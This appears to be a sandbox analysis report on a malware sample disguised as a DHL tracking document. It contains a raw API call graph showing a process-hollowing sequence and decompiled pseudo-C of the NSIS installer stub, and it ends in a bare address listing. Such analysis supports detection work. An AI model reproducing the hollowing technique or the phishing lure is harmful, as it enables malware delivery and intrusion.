lstrcatA 3715->3717 3719 40596c 3 API calls 3715->3719 3718 40360d 3717->3718 3831 403897 3718->3831 3719->3717 3722 405659 18 API calls 3723 403676 3722->3723 3724 4036ff 3723->3724 3726 40596c 3 API calls 3723->3726 3725 405659 18 API calls 3724->3725 3727 403705 3725->3727 3728 4036a2 3726->3728 3729 403715 LoadImageA 3727->3729 3730 405aa7 18 API calls 3727->3730 3728->3724 3733 4036be lstrlenA 3728->3733 3736 4055a3 CharNextA 3728->3736 3731 403740 RegisterClassA 3729->3731 3732 4037c9 3729->3732 3730->3729 3734 40377c SystemParametersInfoA CreateWindowExA 3731->3734 3763 4037d3 3731->3763 3735 40140b 2 API calls 3732->3735 3737 4036f2 3733->3737 3738 4036cc lstrcmpiA 3733->3738 3734->3732 3739 4037cf 3735->3739 3741 4036bc 3736->3741 3740 405578 3 API calls 3737->3740 3738->3737 3742 4036dc GetFileAttributesA 3738->3742 3743 403897 19 API calls 3739->3743 3739->3763 3744 4036f8 3740->3744 3741->3733 3745 4036e8 3742->3745 3747 4037e0 3743->3747 3841 405a85 lstrcpynA 3744->3841 3745->3737 3746 4055bf 2 API calls 3745->3746 3746->3737 3749 403864 3747->3749 3750 4037e8 ShowWindow LoadLibraryA 3747->3750 3842 404ef5 OleInitialize 3749->3842 3751 403807 LoadLibraryA 3750->3751 3752 40380e GetClassInfoA 3750->3752 3751->3752 3754 403822 GetClassInfoA RegisterClassA 3752->3754 3755 403838 DialogBoxParamA 3752->3755 3754->3755 3757 40140b 2 API calls 3755->3757 3756 40386a 3758 403886 3756->3758 3759 40386e 3756->3759 3761 403860 3757->3761 3760 40140b 2 API calls 3758->3760 3762 40140b 2 API calls 3759->3762 3759->3763 3760->3763 3761->3763 3762->3763 3763->3618 3764->3606 3857 405a85 lstrcpynA 3765->3857 3767 40566a 3768 40560c 4 API calls 3767->3768 3769 405670 3768->3769 3770 4033e3 3769->3770 3771 405ce3 5 API calls 3769->3771 3770->3618 3779 405a85 lstrcpynA 3770->3779 3777 405680 3771->3777 3772 4056ab lstrlenA 3773 4056b6 3772->3773 3772->3777 3775 405578 3 API calls 3773->3775 3774 405d7c 2 API calls 3774->3777 3776 4056bb GetFileAttributesA 3775->3776 3776->3770 3777->3770 3777->3772 3777->3774 3778 4055bf 2 API calls 3777->3778 3778->3772 3779->3649 3780->3620 3782 4035c1 3781->3782 3783 4035b7 CloseHandle 3781->3783 3784 4035d5 3782->3784 3785 4035cb CloseHandle 3782->3785 3783->3782 3858 4053aa 3784->3858 3785->3784 3788->3640 3789->3662 3791 405da3 3 API calls 3790->3791 3796 4057de 3791->3796 3792 40583b GetShortPathNameA 3794 405850 3792->3794 3795 405930 3792->3795 3794->3795 3798 405858 wsprintfA 3794->3798 3795->3662 3796->3792 3796->3795 3901 40575c GetFileAttributesA CreateFileA 3796->3901 3797 40581f CloseHandle GetShortPathNameA 3797->3795 3799 405833 3797->3799 3800 405aa7 18 API calls 3798->3800 3799->3792 3799->3795 3801 405880 3800->3801 3902 40575c GetFileAttributesA CreateFileA 3801->3902 3803 40588d 3803->3795 3804 40589c GetFileSize GlobalAlloc 3803->3804 3805 405929 CloseHandle 3804->3805 3806 4058ba ReadFile 3804->3806 3805->3795 3806->3805 3807 4058ce 3806->3807 3807->3805 3903 4056d1 lstrlenA 3807->3903 3810 4058e3 3908 405a85 lstrcpynA 3810->3908 3811 40593d 3813 4056d1 4 API calls 3811->3813 3814 4058f1 3813->3814 3815 405904 SetFilePointer WriteFile GlobalFree 3814->3815 3815->3805 3817 405320 3816->3817 3818 405314 CloseHandle 3816->3818 3817->3662 3818->3817 3820 401389 2 API calls 3819->3820 3821 401420 3820->3821 3821->3628 3822->3681 3823->3683 3825 4055cc 3824->3825 3826 4055d1 CharPrevA 3825->3826 3827 402cc7 3825->3827 3826->3825 3826->3827 3828 405a85 lstrcpynA 3827->3828 3828->3687 3829->3697 3830->3705 3832 4038ab 3831->3832 3849 4059e3 wsprintfA 3832->3849 3834 40391c 3835 405aa7 18 API calls 3834->3835 3836 403928 SetWindowTextA 3835->3836 3837 403944 3836->3837 3838 40365e 3836->3838 3837->3838 3839 405aa7 18 API calls 3837->3839 3838->3722 3839->3837 3840->3718 3841->3724 3850 403e83 3842->3850 3844 404f18 3848 404f3f 3844->3848 3853 401389 3844->3853 3845 403e83 SendMessageA 3846 404f51 OleUninitialize 3845->3846 3846->3756 3848->3845 3849->3834 3851 403e9b 3850->3851 3852 403e8c SendMessageA 3850->3852 3851->3844 3852->3851 3855 401390 3853->3855 3854 4013fe 3854->3844 3855->3854 3856 4013cb MulDiv SendMessageA 3855->3856 3856->3855 3857->3767 3859 405659 18 API calls 3858->3859 3860 4053be 3859->3860 3861 4053c7 DeleteFileA 3860->3861 3862 4053de 3860->3862 3866 403416 OleUninitialize 3861->3866 3865 40551d 3862->3865 3899 405a85 lstrcpynA 3862->3899 3864 405408 3867 405419 3864->3867 3868 40540c lstrcatA 3864->3868 3865->3866 3869 405d7c 2 API calls 3865->3869 3866->3626 3866->3627 3871 4055bf 2 API calls 3867->3871 3870 40541f 3868->3870 3872 405538 3869->3872 3873 40542d lstrcatA 3870->3873 3874 405438 lstrlenA FindFirstFileA 3870->3874 3871->3870 3872->3866 3875 405578 3 API calls 3872->3875 3873->3874 3876 405513 3874->3876 3897 40545c 3874->3897 3877 405542 3875->3877 3876->3865 3879 40573d 2 API calls 3877->3879 3878 4055a3 CharNextA 3878->3897 3880 405548 RemoveDirectoryA 3879->3880 3881 405553 3880->3881 3882 40556a 3880->3882 3881->3866 3886 405559 3881->3886 3883 404e23 25 API calls 3882->3883 3883->3866 3884 4054f2 FindNextFileA 3887 40550a FindClose 3884->3887 3884->3897 3888 404e23 25 API calls 3886->3888 3887->3876 3889 405561 3888->3889 3890 4057d3 38 API calls 3889->3890 3894 405568 3890->3894 3891 40573d 2 API calls 3892 4054bf DeleteFileA 3891->3892 3892->3897 3893 4053aa 59 API calls 3893->3897 3894->3866 3895 404e23 25 API calls 3895->3884 3896 404e23 25 API calls 3896->3897 3897->3878 3897->3884 3897->3891 3897->3893 3897->3895 3897->3896 3898 4057d3 38 API calls 3897->3898 3900 405a85 lstrcpynA 3897->3900 3898->3897 3899->3864 3900->3897 3901->3797 3902->3803 3904 405707 lstrlenA 3903->3904 3905 4056e5 lstrcmpiA 3904->3905 3906 405711 3904->3906 3905->3906 3907 4056fe CharNextA 3905->3907 3906->3810 3906->3811 3907->3904 3908->3814 3909 23807dd 3921 23806c7 GetPEB 3909->3921 3911 2380842 3912 238095b CreateFileW 3911->3912 3913 2380980 3912->3913 3914 2380982 3912->3914 3914->3913 3915 2380995 VirtualAlloc 3914->3915 3915->3913 3916 23809af ReadFile 3915->3916 3916->3913 3917 23809c7 FindCloseChangeNotification 3916->3917 3918 23809d8 3917->3918 3922 2380e93 3918->3922 3921->3911 3936 23806c7 GetPEB 3922->3936 3924 2380eea 3925 2380fd5 3924->3925 3927 2380fe2 3924->3927 3935 23809e3 ExitProcess 3924->3935 3937 23811bb 3925->3937 3927->3935 3958 2380267 3927->3958 3929 23810e8 3930 2381155 3929->3930 3931 2380267 11 API calls 3929->3931 3929->3935 3932 2380267 11 API calls 3930->3932 3931->3929 3933 2381174 3932->3933 3933->3935 3967 23801b6 3933->3967 3936->3924 3976 23806c7 GetPEB 3937->3976 3939 23811c9 3940 23812f7 CreateProcessW 3939->3940 3957 23812d2 3939->3957 3941 238130e GetThreadContext 3940->3941 3940->3957 3942 2381331 ReadProcessMemory 3941->3942 3941->3957 3943 2381355 3942->3943 3942->3957 3944 2381388 VirtualAllocEx 3943->3944 3977 2380368 3943->3977 3945 23813b2 3944->3945 3944->3957 3947 2380267 11 API calls 3945->3947 3949 23813c8 3947->3949 3948 238137c 3948->3944 3948->3957 3950 2381422 3949->3950 3951 2380267 11 API calls 3949->3951 3949->3957 3952 2380267 11 API calls 3950->3952 3951->3949 3953 238143c 3952->3953 3954 2381445 SetThreadContext 3953->3954 3953->3957 3955 238146a 3954->3955 3954->3957 3956 23801b6 11 API calls 3955->3956 3956->3957 3957->3935 3959 2380282 3958->3959 3960 2380706 GetPEB 3959->3960 3961 23802a3 3960->3961 3962 23802ab 3961->3962 3963 2380335 3961->3963 3965 2380402 10 API calls 3962->3965 4011 2380180 3963->4011 3966 238031c 3965->3966 3966->3929 3968 23801d1 3967->3968 3969 2380706 GetPEB 3968->3969 3970 23801f2 3969->3970 3971 238023c 3970->3971 3972 23801f6 3970->3972 4014 2380192 3971->4014 3974 2380402 10 API calls 3972->3974 3975 2380231 3974->3975 3975->3935 3976->3939 3978 238037b 3977->3978 3986 2380706 GetPEB 3978->3986 3980 238039c 3981 23803a0 3980->3981 3982 23803e6 3980->3982 3988 2380402 GetPEB 3981->3988 4002 23801a4 3982->4002 3985 23803db 3985->3948 3987 2380729 3986->3987 3987->3980 3989 2380467 3988->3989 4005 2380744 GetPEB 3989->4005 3992 23804ec 3993 23804fd VirtualAlloc 3992->3993 3996 23805c2 3992->3996 3994 2380513 ReadFile 3993->3994 3993->3996 3995 2380528 VirtualAlloc 3994->3995 3994->3996 3995->3996 3999 2380549 3995->3999 3997 238060b 3996->3997 3998 2380600 VirtualFree 3996->3998 3997->3985 3998->3997 3999->3996 4000 23805b1 FindCloseChangeNotification 3999->4000 4001 23805b5 VirtualFree 3999->4001 4000->4001 4001->3996 4003 2380402 10 API calls 4002->4003 4004 23801ae 4003->4004 4004->3985 4006 2380757 4005->4006 4008 23804db CreateFileW 4006->4008 4009 2380616 GetPEB 4006->4009 4008->3992 4008->3996 4010 2380641 4009->4010 4010->4006 4012 2380402 10 API calls 4011->4012 4013 238018a 4012->4013 4013->3966 4015 2380402 10 API calls 4014->4015 4016 238019c 4015->4016 4016->3975 4854 401ca5 4855 4029cb 18 API calls 4854->4855 4856 401cb5 SetWindowLongA 4855->4856 4857 40287d 4856->4857 4576 401a26 4577 4029cb 18 API calls 4576->4577 4578 401a2c 4577->4578 4579 4029cb 18 API calls 4578->4579 4580 4019d6 4579->4580 4858 4045aa 4859 4045d6 4858->4859 4860 4045ba 4858->4860 4862 404609 4859->4862 4863 4045dc SHGetPathFromIDListA 4859->4863 4869 40532a GetDlgItemTextA 4860->4869 4865 4045f3 SendMessageA 4863->4865 4866 4045ec 4863->4866 4864 4045c7 SendMessageA 4864->4859 4865->4862 4867 40140b 2 API calls 4866->4867 4867->4865 4869->4864 4581 402b2d 4582 402b55 4581->4582 4583 402b3c SetTimer 4581->4583 4584 402ba3 4582->4584 4585 402ba9 MulDiv 4582->4585 4583->4582 4586 402b63 wsprintfA SetWindowTextA SetDlgItemTextA 4585->4586 4586->4584 4870 401bad 4871 4029cb 18 API calls 4870->4871 4872 401bb4 4871->4872 4873 4029cb 18 API calls 4872->4873 4874 401bbe 4873->4874 4875 401bce 4874->4875 4876 4029e8 18 API calls 4874->4876 4877 401bde 4875->4877 4878 4029e8 18 API calls 4875->4878 4876->4875 4879 401be9 4877->4879 4880 401c2d 4877->4880 4878->4877 4882 4029cb 18 API calls 4879->4882 4881 4029e8 18 API calls 4880->4881 4883 401c32 4881->4883 4884 401bee 4882->4884 4885 4029e8 18 API calls 4883->4885 4886 4029cb 18 API calls 4884->4886 4888 401c3b FindWindowExA 4885->4888 4887 401bf7 4886->4887 4889 401c1d SendMessageA 4887->4889 4890 401bff SendMessageTimeoutA 4887->4890 4891 401c59 4888->4891 4889->4891 4890->4891 4588 40422e 4589 404264 4588->4589 4590 40423e 4588->4590 4592 403e9e 8 API calls 4589->4592 4591 403e37 19 API calls 4590->4591 4593 40424b SetDlgItemTextA 4591->4593 4594 404270 4592->4594 4593->4589 4595 402630 4596 4029e8 18 API calls 4595->4596 4597 402637 FindFirstFileA 4596->4597 4598 40265a 4597->4598 4602 40264a 4597->4602 4600 402661 4598->4600 4603 4059e3 wsprintfA 4598->4603 4604 405a85 lstrcpynA 4600->4604 4603->4600 4604->4602 4892 4024b0 4893 4024b5 4892->4893 4894 4024c6 4892->4894 4895 4029cb 18 API calls 4893->4895 4896 4029e8 18 API calls 4894->4896 4899 4024bc 4895->4899 4897 4024cd lstrlenA 4896->4897 4897->4899 4898 40264e 4899->4898 4900 4024ec WriteFile 4899->4900 4900->4898 3456 4015b3 3457 4029e8 18 API calls 3456->3457 3458 4015ba 3457->3458 3474 40560c CharNextA CharNextA 3458->3474 3460 40160a 3462 40162d 3460->3462 3463 40160f 3460->3463 3461 4055a3 CharNextA 3464 4015d0 CreateDirectoryA 3461->3464 3468 401423 25 API calls 3462->3468 3465 401423 25 API calls 3463->3465 3466 4015e5 GetLastError 3464->3466 3470 4015c2 3464->3470 3467 401616 3465->3467 3469 4015f2 GetFileAttributesA 3466->3469 3466->3470 3480 405a85 lstrcpynA 3467->3480 3473 40215b 3468->3473 3469->3470 3470->3460 3470->3461 3472 401621 SetCurrentDirectoryA 3472->3473 3475 405626 3474->3475 3477 405632 3474->3477 3476 40562d CharNextA 3475->3476 3475->3477 3479 40564f 3476->3479 3478 4055a3 CharNextA 3477->3478 3477->3479 3478->3477 3479->3470 3480->3472 3481 401734 3482 4029e8 18 API calls 3481->3482 3483 40173b 3482->3483 3484 401761 3483->3484 3485 401759 3483->3485 3536 405a85 lstrcpynA 3484->3536 3535 405a85 lstrcpynA 3485->3535 3488 40176c 3537 405578 lstrlenA CharPrevA 3488->3537 3489 40175f 3492 405ce3 5 API calls 3489->3492 3495 40177e 3492->3495 3497 401795 CompareFileTime 3495->3497 3498 401859 3495->3498 3505 405aa7 18 API calls 3495->3505 3511 405a85 lstrcpynA 3495->3511 3518 401830 3495->3518 3519 40575c GetFileAttributesA CreateFileA 3495->3519 3540 405d7c FindFirstFileA 3495->3540 3543 40573d GetFileAttributesA 3495->3543 3546 405346 3495->3546 3497->3495 3499 404e23 25 API calls 3498->3499 3501 401863 3499->3501 3500 404e23 25 API calls 3507 401845 3500->3507 3520 402f01 3501->3520 3504 40188a SetFileTime 3506 40189c FindCloseChangeNotification 3504->3506 3505->3495 3506->3507 3508 4018ad 3506->3508 3509 4018b2 3508->3509 3510 4018c5 3508->3510 3512 405aa7 18 API calls 3509->3512 3513 405aa7 18 API calls 3510->3513 3511->3495 3514 4018ba lstrcatA 3512->3514 3515 4018cd 3513->3515 3514->3515 3517 405346 MessageBoxIndirectA 3515->3517 3517->3507 3518->3500 3518->3507 3519->3495 3521 402f12 SetFilePointer 3520->3521 3522 402f2e 3520->3522 3521->3522 3550 40302c GetTickCount 3522->3550 3525 402f3f ReadFile 3526 402f5f 3525->3526 3534 401876 3525->3534 3527 40302c 42 API calls 3526->3527 3526->3534 3528 402f76 3527->3528 3529 402ff1 ReadFile 3528->3529 3530 402f86 3528->3530 3528->3534 3529->3534 3532 402fa1 ReadFile 3530->3532 3533 402fba WriteFile 3530->3533 3530->3534 3532->3530 3532->3534 3533->3530 3533->3534 3534->3504 3534->3506 3535->3489 3536->3488 3538 405592 lstrcatA 3537->3538 3539 401772 lstrcatA 3537->3539 3538->3539 3539->3489 3541 405d92 FindClose 3540->3541 3542 405d9d 3540->3542 3541->3542 3542->3495 3544 405759 3543->3544 3545 40574c SetFileAttributesA 3543->3545 3544->3495 3545->3544 3548 40535b 3546->3548 3547 4053a7 3547->3495 3548->3547 3549 40536f MessageBoxIndirectA 3548->3549 3549->3547 3551 403196 3550->3551 3552 40305b 3550->3552 3553 402bc5 32 API calls 3551->3553 3563 4031da SetFilePointer 3552->3563 3559 402f37 3553->3559 3555 403066 SetFilePointer 3560 40308b 3555->3560 3559->3525 3559->3534 3560->3559 3561 403120 WriteFile 3560->3561 3562 403177 SetFilePointer 3560->3562 3564 4031a8 ReadFile 3560->3564 3566 405e9d 3560->3566 3573 402bc5 3560->3573 3561->3559 3561->3560 3562->3551 3563->3555 3565 4031c9 3564->3565 3565->3560 3567 405ec2 3566->3567 3568 405eca 3566->3568 3567->3560 3568->3567 3569 405f51 GlobalFree 3568->3569 3570 405f5a GlobalAlloc 3568->3570 3571 405fd1 GlobalAlloc 3568->3571 3572 405fc8 GlobalFree 3568->3572 3569->3570 3570->3567 3570->3568 3571->3567 3571->3568 3572->3571 3574 402bd3 3573->3574 3575 402beb 3573->3575 3576 402be3 3574->3576 3577 402bdc DestroyWindow 3574->3577 3578 402bf3 3575->3578 3579 402bfb GetTickCount 3575->3579 3576->3560 3577->3576 3588 405ddc 3578->3588 3579->3576 3581 402c09 3579->3581 3582 402c11 3581->3582 3583 402c3e CreateDialogParamA 3581->3583 3582->3576 3592 402ba9 3582->3592 3583->3576 3585 402c1f wsprintfA 3586 404e23 25 API calls 3585->3586 3587 402c3c 3586->3587 3587->3576 3589 405df9 PeekMessageA 3588->3589 3590 405e09 3589->3590 3591 405def DispatchMessageA 3589->3591 3590->3576 3591->3589 3593 402bb8 3592->3593 3594 402bba MulDiv 3592->3594 3593->3594 3594->3585 4612 401634 4613 4029e8 18 API calls 4612->4613 4614 40163a 4613->4614 4615 405d7c 2 API calls 4614->4615 4616 401640 4615->4616 4617 401934 4618 4029cb 18 API calls 4617->4618 4619 40193b 4618->4619 4620 4029cb 18 API calls 4619->4620 4621 401945 4620->4621 4622 4029e8 18 API calls 4621->4622 4623 40194e 4622->4623 4624 401961 lstrlenA 4623->4624 4626 40199c 4623->4626 4625 40196b 4624->4625 4625->4626 4630 405a85 lstrcpynA 4625->4630 4628 401985 4628->4626 4629 401992 lstrlenA 4628->4629 4629->4626 4630->4628 4901 4019b5 4902 4029e8 18 API calls 4901->4902 4903 4019bc 4902->4903 4904 4029e8 18 API calls 4903->4904 4905 4019c5 4904->4905 4906 4019cc lstrcmpiA 4905->4906 4907 4019de lstrcmpA 4905->4907 4908 4019d2 4906->4908 4907->4908 4909 4014b7 4910 4014bd 4909->4910 4911 401389 2 API calls 4910->4911 4912 4014c5 4911->4912 4913 4025be 4914 4025c5 4913->4914 4920 40282a 4913->4920 4915 4029cb 18 API calls 4914->4915 4916 4025d0 4915->4916 4917 4025d7 SetFilePointer 4916->4917 4918 4025e7 4917->4918 4917->4920 4921 4059e3 wsprintfA 4918->4921 4921->4920

                    Executed Functions

                    Function 00403225 Relevance: 72.0, APIs: 23, Strings: 18, Instructions: 270filestringcomCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 403225-4032ba #17 SetErrorMode OleInitialize call 405da3 SHGetFileInfoA call 405a85 GetCommandLineA call 405a85 GetModuleHandleA 7 4032c6-4032db call 4055a3 CharNextA 0->7 8 4032bc-4032c1 0->8 11 403340-403344 7->11 8->7 12 403346 11->12 13 4032dd-4032e0 11->13 16 403359-403371 GetTempPathA call 4031f1 12->16 14 4032e2-4032e6 13->14 15 4032e8-4032f0 13->15 14->14 14->15 18 4032f2-4032f3 15->18 19 4032f8-4032fb 15->19 25 403393-4033aa DeleteFileA call 402c5b 16->25 26 403373-403391 GetWindowsDirectoryA lstrcatA call 4031f1 16->26 18->19 20 403330-40333d call 4055a3 19->20 21 4032fd-403301 19->21 20->11 38 40333f 20->38 23 403311-403317 21->23 24 403303-40330c 21->24 30 403327-40332e 23->30 31 403319-403322 23->31 24->23 28 40330e 24->28 39 403411-403420 call 4035a6 OleUninitialize 25->39 40 4033ac-4033b2 25->40 26->25 26->39 28->23 30->20 36 403348-403354 call 405a85 30->36 31->30 35 403324 31->35 35->30 36->16 38->11 50 403426-403436 call 405346 ExitProcess 39->50 51 40350b-403511 39->51 42 403401-403408 call 4035e3 40->42 43 4033b4-4033bd call 4055a3 40->43 48 40340d 42->48 54 4033c8-4033ca 43->54 48->39 52 403513-403530 call 405da3 * 3 51->52 53 40358e-403596 51->53 80 403532-403534 52->80 81 40357a-403585 ExitWindowsEx 52->81 58 403598 53->58 59 40359c-4035a0 ExitProcess 53->59 60 4033cc-4033d6 54->60 61 4033bf-4033c5 54->61 58->59 62 4033d8-4033e5 call 405659 60->62 63 40343c-403456 lstrcatA lstrcmpiA 60->63 61->60 65 4033c7 61->65 62->39 73 4033e7-4033fd call 405a85 * 2 62->73 63->39 67 403458-40346d CreateDirectoryA SetCurrentDirectoryA 63->67 65->54 70 40347a-403494 call 405a85 67->70 71 40346f-403475 call 405a85 67->71 83 403499-4034b5 call 405aa7 DeleteFileA 70->83 71->70 73->42 80->81 84 403536-403538 80->84 81->53 87 403587-403589 call 40140b 81->87 92 4034f6-4034fd 83->92 93 4034b7-4034c7 CopyFileA 83->93 84->81 88 40353a-40354c GetCurrentProcess 84->88 87->53 88->81 97 40354e-403570 88->97 92->83 95 4034ff-403506 call 4057d3 92->95 93->92 96 4034c9-4034e9 call 4057d3 call 405aa7 call 4052e5 93->96 95->39 96->92 107 4034eb-4034f2 CloseHandle 96->107 97->81 107->92
                    C-Code - Quality: 83%
                    			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				intOrPtr _t71;
				intOrPtr _t77;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				intOrPtr _t113;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405DA3(8);
				SHGetFileInfoA(0x41f450, 0,  &_v360, 0x160, 0); // executed
				E00405A85("nkdpnsqeoocyepqnevm Setup", "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\engineer\\Desktop\\DHL AWB TRACKING DETAILS.exe\" ";
				E00405A85(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\engineer\\Desktop\\DHL AWB TRACKING DETAILS.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E004055A3(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E004055A3(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
								if(( *(_t44 + 1) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000002;
									__eflags = _t99;
								}
							}
							__eflags =  *_t44 - 0x4352434e;
							if( *_t44 == 0x4352434e) {
								__eflags = ( *(_t44 + 4) | 0x00000020) - 0x20;
								if(( *(_t44 + 4) | 0x00000020) == 0x20) {
									_t99 = _t99 | 0x00000004;
									__eflags = _t99;
								}
							}
							__eflags =  *((intOrPtr*)(_t44 - 2)) - 0x3d442f20;
							if( *((intOrPtr*)(_t44 - 2)) == 0x3d442f20) {
								 *((intOrPtr*)(_t44 - 2)) = 0;
								_t45 = _t44 + 2;
								__eflags = _t44 + 2;
								E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t45);
								L20:
								_t105 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
								GetTempPathA(0x400, _t105);
								_t48 = E004031F1(_t109);
								_t110 = _t48;
								if(_t48 != 0) {
									L22:
									DeleteFileA("1033"); // executed
									_t50 = E00402C5B(_t111, _t99); // executed
									_v412 = _t50;
									if(_t50 != 0) {
										L32:
										E004035A6();
										__imp__OleUninitialize();
										if(_v408 == 0) {
											__eflags =  *0x423f34; // 0x0
											if(__eflags != 0) {
												_t106 = E00405DA3(3);
												_t100 = E00405DA3(4);
												_t55 = E00405DA3(5);
												__eflags = _t106;
												_t97 = _t55;
												if(_t106 != 0) {
													__eflags = _t100;
													if(_t100 != 0) {
														__eflags = _t97;
														if(_t97 != 0) {
															_t60 =  *_t106(GetCurrentProcess(), 0x28,  &_v396);
															__eflags = _t60;
															if(_t60 != 0) {
																 *_t100(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t97(_v420, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t56 = ExitWindowsEx(2, 0);
												__eflags = _t56;
												if(_t56 == 0) {
													E0040140B(9);
												}
											}
											_t52 =  *0x423f4c; // 0xffffffff
											__eflags = _t52 - 0xffffffff;
											if(_t52 != 0xffffffff) {
												_v400 = _t52;
											}
											ExitProcess(_v400);
										}
										E00405346(_v408, 0x200010);
										ExitProcess(2);
									}
									_t113 =  *0x423ebc; // 0x0
									if(_t113 == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t103 = E004055A3(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										_t101 = "C:\\Users\\engineer\\Desktop";
										if(lstrcmpiA(_t105, "C:\\Users\\engineer\\Desktop") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\engineer\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t101);
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											_t71 =  *0x423eb0; // 0x50f930
											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t71 + 0x120)));
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\engineer\\Desktop\\DHL AWB TRACKING DETAILS.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												_t77 =  *0x423eb0; // 0x50f930
												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *((intOrPtr*)(_t77 + 0x124)));
												_t79 = E004052E5(0x41f050);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004057D3();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E00405659(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
									E00405A85("C:\\Users\\engineer\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004031F1(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}









































                    0x00403231
                    0x00403235
                    0x0040323d
                    0x0040323f
                    0x00403244
                    0x0040324f
                    0x00403256
                    0x0040325e
                    0x00403268
                    0x0040327e
                    0x0040328e
                    0x00403293
                    0x00403299
                    0x004032a0
                    0x004032b3
                    0x004032b8
                    0x004032ba
                    0x004032bc
                    0x004032c1
                    0x004032c1
                    0x004032d1
                    0x004032d7
                    0x00403340
                    0x00403340
                    0x00403342
                    0x00403344
                    0x00000000
                    0x00000000
                    0x004032dd
                    0x004032e0
                    0x004032e8
                    0x004032e8
                    0x004032eb
                    0x004032f0
                    0x004032f2
                    0x004032f2
                    0x004032f3
                    0x004032f3
                    0x004032f8
                    0x004032fb
                    0x00403330
                    0x00403335
                    0x0040333a
                    0x0040333d
                    0x0040333f
                    0x0040333f
                    0x0040333f
                    0x00000000
                    0x004032fd
                    0x004032fd
                    0x004032fe
                    0x00403301
                    0x00403309
                    0x0040330c
                    0x0040330e
                    0x0040330e
                    0x0040330e
                    0x0040330c
                    0x00403311
                    0x00403317
                    0x0040331f
                    0x00403322
                    0x00403324
                    0x00403324
                    0x00403324
                    0x00403322
                    0x00403327
                    0x0040332e
                    0x00403348
                    0x0040334b
                    0x0040334b
                    0x00403354
                    0x00403359
                    0x00403359
                    0x00403364
                    0x0040336a
                    0x0040336f
                    0x00403371
                    0x00403393
                    0x00403398
                    0x0040339f
                    0x004033a6
                    0x004033aa
                    0x00403411
                    0x00403411
                    0x00403416
                    0x00403420
                    0x0040350b
                    0x00403511
                    0x0040351c
                    0x00403525
                    0x00403527
                    0x0040352c
                    0x0040352e
                    0x00403530
                    0x00403532
                    0x00403534
                    0x00403536
                    0x00403538
                    0x00403548
                    0x0040354a
                    0x0040354c
                    0x00403559
                    0x00403568
